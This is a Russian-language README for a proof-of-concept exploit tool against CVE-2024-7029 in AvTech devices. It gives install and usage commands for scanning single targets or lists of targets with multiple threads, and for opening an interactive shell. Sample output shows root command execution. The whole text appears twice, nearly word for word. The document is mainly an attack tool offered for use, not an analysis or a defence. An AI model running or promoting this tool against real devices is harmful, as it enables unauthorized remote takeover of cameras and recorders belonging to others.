
PoC-эксплойт для уязвимости CVE-2024-7029, обнаруженной в устройствах AvTech, позволяющий удалённое выполнение кода (RCE).
GenAvTechRCEExploit — PoC-эксплоит для уязвимости CVE-2024-7029, обнаруженной в устройствах AvTech, позволяющий удаленное выполнение кода (RCE). Этот инструмент может сканировать уязвимые устройства и выполнять на них команды в интерактивном режиме.
requestsprompt_toolkitalive_progressУстановите необходимые библиотеки с помощью:
pip install -r requirements.txt
Для проверки одной цели на уязвимость и запуска интерактивной оболочки:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
Замените <target_url> на реальный URL целевого устройства.
Для сканирования нескольких целей, указанных в файле (один URL на строку):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
Замените <file_path> на путь к вашему файлу, содержащему URL-адреса целей.
Вы можете указать количество потоков для сканирования с помощью опции -t:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
По умолчанию количество потоков установлено на 10.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
GenAvTechRCEExploit - эксплоит для CVE-2024-7029 в устройствах AvTech, позволяющая удаленное выполнение кода (RCE). Этот инструмент может сканировать уязвимые устройства и выполнять на них команды в интерактивном режиме.
requestsprompt_toolkitalive_progressУстановить необходимые библиотеки можно с помощью:
pip install -r requirements.txt
Для проверки уязвимости одной цели и запуска интерактивной оболочки:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
Замените <target_url> на реальный URL целевого устройства.
Для сканирования нескольких целей, указанных в файле (один URL на строку):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
Замените <file_path> на путь к файлу, содержащему URL-адреса целей.
Вы можете указать количество потоков для сканирования с помощью опции -t:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
По умолчанию количество потоков установлено на 10.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20